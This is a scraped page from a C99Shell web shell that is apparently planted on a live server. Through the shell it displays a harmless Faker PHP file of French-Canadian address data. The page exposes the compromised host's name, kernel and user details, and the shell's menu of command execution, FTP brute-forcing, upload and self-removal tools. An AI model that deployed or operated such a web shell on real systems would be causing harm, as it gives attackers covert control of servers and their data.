!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gwp.picotech.app/public_html/vendor/fakerphp/faker/src/Faker/Provider/fr_CA/   drwxr-xr-x
Free 29.26 GB of 117.98 GB (24.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Address.php (4.71 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Faker\Provider\fr_CA;

class 
Address extends \Faker\Provider\fr_FR\Address
{
    protected static 
$cityPrefix = ['Saint-''Sainte-''St-''Ste-'];

    
/**
     * The suffixes come from this list of communities in Québec
     * http://fr.wikipedia.org/wiki/Liste_des_municipalités_locales_du_Québec
     */
    
protected static $citySuffix = [
        
// Bas-Saint-Laurent
        
'-des-Sables''-sur-Mer''-des-Neiges''-des-Sept-Douleurs''-du-Portage''-du-Loup''-des-Lacs''-de-Lessard',
        
'-de-Kamourasca''-de-Témiscouata''-de-Ladrière''-de-Rimouski''-de-Rivière-du-Loup''-du-Lac''-du-Ha! Ha!',
        
'-du-Lac-Long''-de-Rioux''-du-Squatec''-de-Métis''-d\'Ixworth''-de-la-Croix''-de-Matane''-du-Lac-Humqui',
        
'-de-Mérici''-de-la-Pocatière''-sur-le-Lac',
        
// Saguenay–Lac-Saint-Jean
        
'-de-Lorette''-du-Lac-Saint-Jean''-de-Bourget''-de-Falardeau''-les-Plaines''-de-Sales''-de-Taillon',
        
'-de-Milot''-du-Nord',
        
// Québec (Capitale-Nationale)
        
'-aux-Coudres''-des-Anges''-de-Desmaures''-les-Neiges''-de-l\'Île-d\'Orléans''-de-Valcartier',
        
'-de-Portneuf''-du-Cap-Tourmente''-des-Carrières''-des-Caps''-de-Beaupré''-de-Laval''-de-la-Jacques-Cartier',
        
'-d\'Auvergne',
        
// Mauricie
        
'-de-Monteauban''-du-Mont-Carmel''-des-Monts''-de-Maskinongé''-de-Caxton''-des-Grès''-le-Grand',
        
'-de-Vincennes''-du-Parc''-de-Champlain''-de-Mékinac''-de-Prémont''-de-la-Pérade''-de-Batiscan',
        
// Estrie (Cantons de l'est)
        
'-Ouest''-Est''-Sud''-Nord''-des-Bois''-de-Woburn''-de-Brompton''-de-Bolton''-de-Windsor',
        
'-de-Clifton''-de-Paquette''-de-la-Rochelle''-de-Hatley''-de-Whitton',
        
// Montréal
        
'-de-Bellevue',
        
// Chaudière-Appalaches
        
'-de-Buckland''-des-Pins''-du-Rosaire''-d\'Issoudun''-de-Jésus''-d\'Irlande''-de-l\'Isle-aux-Grues',
        
'-de-Tilly''-de-Lellis''-de-Bellechasse''-de-Lessard''-de-L\'Islet''-de-Lotbinière''-de-Beauce',
        
'-de-Forsyth''-de-Panet''-de-la-Rivière-du-Sud''-de-Dorset''-de-Shenley''-de-Leeds''-de-Wolfestown',
        
'-de-Joly''-de-Brébeuf''-de-Coleraine''-des-Érables''-Bretenières''-de-Lauzon''-de-Standon',
        
'-de-Gonzague''-de-Beaurivage''-de-Dorchester''-de-Cranbourne''-de-Broughton''-de-la-Rivière-du-Sud',
        
'-des-Aulnaies''-les-Mines''-de-Lotbinière''-de-Patton''-sur-Rivière-du-Sud''-de-Beauregard''-de-Watford',
    ];

    
/**
     * @example 'Saint-Marc-des-Carrières' or 'Sainte-Monique'
     */
    
protected static $cityFormats = [
        
'{{cityPrefix}}{{firstName}}{{citySuffix}}',
        
'{{cityPrefix}}{{firstName}}',
    ];

    protected static 
$buildingNumber = ['%####''%###''%##''%#''%'];

    protected static 
$streetSuffix = [
        
'Autoroute''Avenue''Boulevard''Chemin''Route''Rue''Pont',
    ];

    protected static 
$postcode = ['?#? #?#''?#?#?#'];

    
/**
     * @example 'Avenue Bolduc'
     */
    
protected static $streetNameFormats = [
        
'{{streetSuffix}} {{firstName}}',
        
'{{streetSuffix}} {{lastName}}',
    ];

    protected static 
$streetAddressFormats = [
        
'{{buildingNumber}} {{streetName}}',
        
'{{buildingNumber}} {{streetName}} {{secondaryAddress}}',
    ];

    protected static 
$addressFormats = [
        
'{{streetAddress}}, {{city}}, {{stateAbbr}} {{postcode}}',
    ];

    protected static 
$secondaryAddressFormats = ['Apt. ###''Suite ###''Bureau ###'];

    protected static 
$state = [
        
'Alberta''Colombie-Britannique''Manitoba''Nouveau-Brunswick''Terre-Neuve-et-Labrador''Nouvelle-Écosse''Ontario''Île-du-Prince-Édouard''Québec''Saskatchewan',
    ];

    protected static 
$stateAbbr = [
        
'AB''BC''MB''NB''NL''NS''ON''PE''QC''SK',
    ];

    
/**
     * @example 'Saint-'
     */
    
public static function cityPrefix()
    {
        return static::
randomElement(static::$cityPrefix);
    }

    
/**
     * @example '-des-Sables'
     */
    
public static function citySuffix()
    {
        return static::
randomElement(static::$citySuffix);
    }

    
/**
     * @example 'Bureau 500'
     */
    
public static function secondaryAddress()
    {
        return static::
numerify(static::randomElement(static::$secondaryAddressFormats));
    }

    
/**
     * @example 'Québec'
     */
    
public static function state()
    {
        return static::
randomElement(static::$state);
    }

    
/**
     * @example 'QC'
     */
    
public static function stateAbbr()
    {
        return static::
randomElement(static::$stateAbbr);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--